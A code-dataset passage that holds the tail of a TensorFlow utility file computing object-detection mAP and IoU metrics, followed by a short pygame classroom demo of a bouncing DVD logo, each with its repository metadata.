tf.reduce_sum(tf.reduce_sum(tf.cast(tf.greater_equal(iou_matrix_class_detections, iou_threshold),\n dtype='float32'), axis=1) - 1)\n\n fp = fp1 + fp2\n\n precision = tp / (tp + fp + epsilon)\n recall = tp / (tp + fn + epsilon)\n\n f1score = 2 * precision * recall / (precision + recall + epsilon)\n\n recalls = recalls.write(i_score, recall)\n precisions = precisions.write(i_score, precision)\n f1scores = f1scores.write(i_score, f1score)\n ious = ious.write(i_score, mean_iou_boxes)\n\n recalls = recalls.write(n_scores - 1, 0)\n precisions = precisions.write(n_scores - 1, 1)\n f1scores = f1scores.write(n_scores - 1, 0)\n\n recalls = recalls.stack()\n precisions = precisions.stack()\n mean_iou_class = tf.reduce_mean(ious.stack())\n mean_ious = mean_ious.write(jj, mean_iou_class)\n\n # compute AP without interpolation:\n average_precision = tf.abs(-tf.reduce_sum(tf.experimental.numpy.diff(recalls) * precisions[:-1]))\n average_precisions = average_precisions.write(jj, average_precision)\n\n # compute detection score at maximum f1score:\n f1scores = f1scores.stack()\n argmax_f1scores = tf.argmax(f1scores)\n score_maxf1 = tf.gather(scores, argmax_f1scores)\n # save detection score at maximum f1score for each class only if it is non-zero:\n if tf.greater(score_maxf1, 0.):\n scores_maxf1 = scores_maxf1.write(jj, tf.stack([tf.cast(i_class, dtype=tf.float32), score_maxf1], axis=0))\n\n mean_iou = tf.reduce_mean(mean_ious.stack())\n\n # Stack the score_maxf1 values. The returned tensor will have two columns, the first will hold the classes\n # for which scores_maxf1 is non-zero, and the second will hold the scores_maxf1 value for that class.\n scores_maxf1 = scores_maxf1.stack()\n\n mean_average_precision = tf.reduce_mean(average_precisions.stack())\n\n return mean_average_precision, mean_iou, scores_maxf1\n\n\n@tf.function()\ndef compute_map_iou_per_batch(gt_boxes_tensors, gt_one_hot_labels_tensors, detections, batch_size,\n iou_threshold=0.5, n_scores=100, num_classes=1):\n # initialize tensor array for aggregating mAP values for each image in the batch:\n mean_average_precisions_batch = \\\n tf.TensorArray(tf.float32, size=batch_size, dynamic_size=False, clear_after_read=True)\n mean_iou_batch = \\\n tf.TensorArray(tf.float32, size=batch_size, dynamic_size=False, clear_after_read=True)\n scores_maxf1_batch = \\\n tf.TensorArray(tf.float32, size=0, dynamic_size=True, clear_after_read=True, infer_shape=False)\n scores_maxf1 = \\\n tf.TensorArray(tf.float32, size=num_classes, dynamic_size=False, clear_after_read=True)\n\n for ii in range(batch_size):\n # invert one-hot encodings back to 'dense' labels:\n gt_labels_tensor = tf.cast(tf.argmax(gt_one_hot_labels_tensors[ii], axis=1), dtype='int32')\n gt_boxes_tensor = gt_boxes_tensors[ii]\n\n # unpack the predicted classes and boxes from the `detections` dictionary:\n pred_labels_tensor = tf.cast(detections['detection_classes'][ii], dtype='int32')\n pred_boxes_tensor = detections['detection_boxes'][ii]\n pred_boxes_scores = detections['detection_scores'][ii]\n\n # ------------------------------------------------------------------------------\n\n mean_average_precision, mean_iou, scores_maxf1_img = \\\n compute_map_iou_per_image(gt_boxes_tensor, gt_labels_tensor,\n pred_boxes_tensor, pred_labels_tensor, pred_boxes_scores,\n iou_threshold=iou_threshold, n_scores=n_scores)\n\n mean_average_precisions_batch = mean_average_precisions_batch.write(ii, mean_average_precision)\n mean_iou_batch = mean_iou_batch.write(ii, mean_iou)\n scores_maxf1_batch = scores_maxf1_batch.write(ii, scores_maxf1_img)\n\n map_batch = tf.reduce_mean(mean_average_precisions_batch.stack())\n mean_iou_batch = tf.reduce_mean(mean_iou_batch.stack())\n\n scores_maxf1_all = scores_maxf1_batch.concat()\n # Loop through the classes and determine the mean score_maxf1. If there were no detections for that class\n # in this batch, the score_maxf1 or it will be nan.\n for i_class in tf.range(num_classes):\n # mask = tf.equal(scores_maxf1_all[:, 0], tf.cast(i_class, tf.float32))\n # if tf.not_equal(tf.size(mask), 0):\n # scores_maxf1_class = tf.boolean_mask(scores_maxf1_all[:, 1], mask, axis=0)\n\n index_class = tf.where(tf.equal(scores_maxf1_all[:, 0], tf.cast(i_class, tf.float32)))\n scores_maxf1_class = tf.gather(scores_maxf1_all[:, 1], index_class)\n scores_maxf1 = scores_maxf1.write(i_class, tf.reduce_mean(scores_maxf1_class))\n\n scores_maxf1 = scores_maxf1.stack()\n\n return map_batch, mean_iou_batch, scores_maxf1\n\n\ndef get_datagen(image_path_list, gt_boxes_list, gt_labels_list, num_classes, label_id_offset):\n \"\"\"\n Returns a data generator for feeding a tensorflow.Dataset object.\n\n :param image_path_list: array-like\n List of the image files.\n :param gt_boxes_list: list of numpy.ndarray\n List of bounding box arrays corresponding to the images in `image_path_list`.\n Each array has a shape of (n_boxes, 4) where the 4 columns contain the (ymin, xmin, ymax, xmax) values in\n relative coordinates in [1,0].\n :param gt_labels_list: list of numpy.ndarray\n List of classification label arrays.\n :param num_classes: int\n The total number of ground truth classes\n :param label_id_offset: int\n The offset of label id's with respect to a labelling scheme that starts with 0.\n :return: generator function\n \"\"\"\n\n def datagen():\n for (image_path, gt_boxes_np, gt_labels_np) in zip(image_path_list, gt_boxes_list, gt_labels_list):\n # # Load next image into PIL format:\n # image_pil = tf.keras.utils.load_img(image_path)\n # # Convert the image into a numpy array:\n # image_np = tf.keras.preprocessing.image.img_to_array(image_pil, dtype='uint8')\n # # Covert the image array into tensor and add a batch dimension:\n # image_tensor = tf.expand_dims(tf.convert_to_tensor(image_np, dtype=tf.float32), axis=0)\n\n image = tf.io.read_file(image_path)\n image_tensor = tf.io.decode_image(image, channels=3, dtype=tf.uint8)\n image_shape = tf.convert_to_tensor(image_tensor.shape, dtype=tf.int32)\n image_tensor = tf.cast(image_tensor, dtype=tf.float32)\n\n # Run the image tensor through the model's preprocessing method\n # this requires a batch dimension:\n # image_tensor = tf.expand_dims(image_tensor, axis=0)\n # image_tensor = tf.squeeze(model.preprocess(image_tensor)[0], axis=0)\n image_tensor = tf.RaggedTensor.from_tensor(image_tensor, row_splits_dtype=tf.int32)\n\n # Convert the groundtruth boxes from numpy array into tensor:\n gt_boxes_tensor = tf.convert_to_tensor(gt_boxes_np, dtype=tf.float32)\n gt_boxes_rtensor = tf.RaggedTensor.from_tensor(gt_boxes_tensor, row_splits_dtype=tf.int32)\n\n # Offset the groundtruth labels to start from 0,\n # convert the labels numpy array into tensor,\n # and change the labels into one-hot representation:\n zero_indexed_groundtruth_classes = tf.convert_to_tensor(gt_labels_np - label_id_offset)\n val_gt_one_hot_labels_tensor = tf.one_hot(zero_indexed_groundtruth_classes, num_classes)\n val_gt_one_hot_labels_rtensor = tf.RaggedTensor.from_tensor(val_gt_one_hot_labels_tensor,\n row_splits_dtype=tf.int32)\n\n yield image_tensor, image_shape, gt_boxes_rtensor, val_gt_one_hot_labels_rtensor\n\n return datagen\n", "repo_name": "idekany/TuneRetinaNet", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 38912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 44, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 152, "usage_type": "attribute"}, {"api_name": "tensorflow.io.gfile.GFile", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 167, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 168, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 168, "usage_type": "name"}, {"api_name": "six.BytesIO", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 171, "usage_type": "attribute"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 199, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imsave", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 261, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 279, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 280, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 285, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 285, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 295, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 296, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 302, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 310, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 311, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 313, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 347, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 363, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 364, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 364, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 368, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 368, "usage_type": "name"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 372, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 372, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 387, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 387, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 388, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 390, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 390, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 421, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 444, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 444, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 448, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 448, "usage_type": "name"}, {"api_name": "numpy.ones_like", "line_number": 451, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 464, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 464, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 466, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 466, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 472, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 498, "usage_type": "attribute"}, {"api_name": "tensorflow.atan", "line_number": 501, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 501, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 501, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 505, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 505, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 506, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 506, "usage_type": "call"}, {"api_name": "tensorflow.atan", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 514, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 514, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 515, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 515, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 518, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 518, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 519, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 519, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 528, "usage_type": "call"}, {"api_name": "matplotlib.patches.Ellipse", "line_number": 538, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 538, "usage_type": "attribute"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 552, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 567, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 568, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 570, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 571, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 573, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 574, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 581, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 582, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 589, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 590, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 608, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 610, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 611, "usage_type": "call"}, {"api_name": "tensorflow.maximum", "line_number": 613, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 613, "usage_type": "call"}, {"api_name": "tensorflow.maximum", "line_number": 614, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 614, "usage_type": "call"}, {"api_name": "tensorflow.minimum", "line_number": 615, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 615, "usage_type": "call"}, {"api_name": "tensorflow.minimum", "line_number": 616, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 616, "usage_type": "call"}, {"api_name": "tensorflow.maximum", "line_number": 618, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 622, "usage_type": "call"}, {"api_name": "tensorflow.function", "line_number": 595, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 653, "usage_type": "call"}, {"api_name": "tensorflow.unique", "line_number": 655, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 656, "usage_type": "call"}, {"api_name": "tensorflow.TensorArray", "line_number": 659, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 659, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 660, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 660, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 661, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 661, "usage_type": "attribute"}, {"api_name": "tensorflow.range", "line_number": 664, "usage_type": "call"}, {"api_name": "tensorflow.TensorArray", "line_number": 669, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 669, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 670, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 670, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 671, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 671, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 672, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 672, "usage_type": "attribute"}, {"api_name": "tensorflow.squeeze", "line_number": 676, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 676, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 677, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 679, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 679, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 682, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 685, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 687, "usage_type": "call"}, {"api_name": "tensorflow.linspace", "line_number": 687, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 695, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 700, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 700, "usage_type": "call"}, {"api_name": "tensorflow.logical_and", "line_number": 701, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 701, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 702, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 704, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 709, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 709, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 713, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 713, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 714, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 714, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 719, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 719, "usage_type": "call"}, {"api_name": "tensorflow.logical_not", "line_number": 720, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 720, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 720, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 725, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 725, "usage_type": "call"}, {"api_name": "tensorflow.logical_not", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 730, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 730, "usage_type": "call"}, {"api_name": "tensorflow.boolean_mask", "line_number": 732, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 734, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 734, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 734, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 755, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.experimental.numpy.diff", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.experimental", "line_number": 759, "usage_type": "attribute"}, {"api_name": "tensorflow.argmax", "line_number": 764, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 765, "usage_type": "call"}, {"api_name": "tensorflow.greater", "line_number": 767, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 768, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 768, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 768, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 770, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 776, "usage_type": "call"}, {"api_name": "tensorflow.function", "line_number": 627, "usage_type": "call"}, {"api_name": "tensorflow.TensorArray", "line_number": 786, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 786, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 788, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 788, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 790, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 790, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 792, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 792, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 796, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 796, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 800, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 815, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 816, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 821, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 826, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 826, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 826, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 826, "usage_type": "attribute"}, {"api_name": "tensorflow.gather", "line_number": 827, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 828, "usage_type": "call"}, {"api_name": "tensorflow.function", "line_number": 781, "usage_type": "call"}, {"api_name": "tensorflow.io.read_file", "line_number": 863, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 863, "usage_type": "attribute"}, {"api_name": "tensorflow.io.decode_image", "line_number": 864, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 864, "usage_type": "attribute"}, {"api_name": "tensorflow.uint8", "line_number": 864, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 865, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 865, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 866, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 866, "usage_type": "attribute"}, {"api_name": "tensorflow.RaggedTensor.from_tensor", "line_number": 872, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor", "line_number": 872, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 872, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 875, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 875, "usage_type": "attribute"}, {"api_name": "tensorflow.RaggedTensor.from_tensor", "line_number": 876, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor", "line_number": 876, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 876, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 881, "usage_type": "call"}, {"api_name": "tensorflow.one_hot", "line_number": 882, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor.from_tensor", "line_number": 883, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor", "line_number": 883, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 884, "usage_type": "attribute"}]}
+{"seq_id": "23674110279", "text": "'''\nCS 150 Introduction to OOP\n\nDemos a bouncing photo\n'''\nimport pygame\n\n# Specify the width and height of the screen for the game\nSCREEN_WIDTH = 1080\nSCREEN_HEIGHT = 720\n\n# Photo to display\nPHOTO = 'DVD.png' # 'red_logo.png'\n\n# Frames-Per-Second for game updates\nFPS = 60\n\nclass Box():\n def __init__(self):\n self.rect = pygame.Rect(0, 180, 320, 191)\n self.velocity = [200,200]\n img = pygame.image.load(PHOTO)\n self.image = pygame.transform.scale(img, self.rect.size)\n \n def update(self,dt):\n self.rect.x += self.velocity[0]*dt\n self.rect.y += self.velocity[1]*dt\n \n # Use the relevant attributes to check if rectangle has hit the edges\n # of the screen (0,0 is the upper left corner)\n if (self.rect.left < 0 or self.rect.right > SCREEN_WIDTH):\n self.velocity[0] *= -1\n if (self.rect.top < 0 or self.rect.bottom > SCREEN_HEIGHT):\n self.velocity[1] *= -1\n \n def render(self, display):\n # Show the bouncing object at the current location\n display.blit(self.image, self.rect)\n\ndef play_game():\n # Initialize pygame\n pygame.init()\n pygame.font.init()\n\n # Initialize the screen\n screen = pygame.display.set_mode( (SCREEN_WIDTH,SCREEN_HEIGHT) )\n\n # Initialize game elements\n box = Box()\n\n # Initialize some game variables\n time = 0\n delta_t = 1/FPS\n\n # Setup the font and clock\n font = pygame.font.SysFont('Arial',14)\n clock = pygame.time.Clock()\n\n # Main game loop\n while True:\n \n # Get the event corresponding to user input\n event = pygame.event.poll()\n if event.type == pygame.QUIT:\n break\n\n # Draw the scene\n screen.fill((255,255,255)) # Fill the scene with white (specified by RGB tuple)\n\n box.update(delta_t) # Update the position of the box\n box.render(screen) # Show the bouncing object\n\n # Update and draw the current time in the bottom left corner\n time += delta_t\n text = font.render('Time=' + str(round(time,1)) + ' seconds',True,(0,0,0))\n screen.blit(text,(10,0.95*SCREEN_HEIGHT))\n\n # Update the screen\n pygame.display.update()\n clock.tick(FPS)\n\n pygame.quit()\n\n\n", "repo_name": "Norvoke/middcs150", "sub_path": "Week 11/logo_pygame.py", "file_name": "logo_pygame.py", "file_ext": "py", "file_size_in_byte": 2270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.Rect", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.font.init", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.event.poll", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 82, "usage_type": "call"}]}
